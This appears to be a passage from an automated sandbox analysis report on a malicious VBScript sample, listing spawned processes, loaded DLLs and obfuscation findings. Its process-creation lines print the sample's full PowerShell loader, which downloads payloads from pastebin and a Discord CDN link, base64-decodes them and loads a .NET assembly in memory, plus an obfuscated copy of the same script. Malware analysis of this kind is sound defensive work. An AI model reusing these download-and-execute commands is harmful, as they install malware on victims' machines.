            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.rJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /cJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat textJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: segura.vbsStatic file information: File size 15017006 > 1048576

            Data Obfuscation

            barindex
            Found suspicious powershell code related to unpacking or dynamic code loading
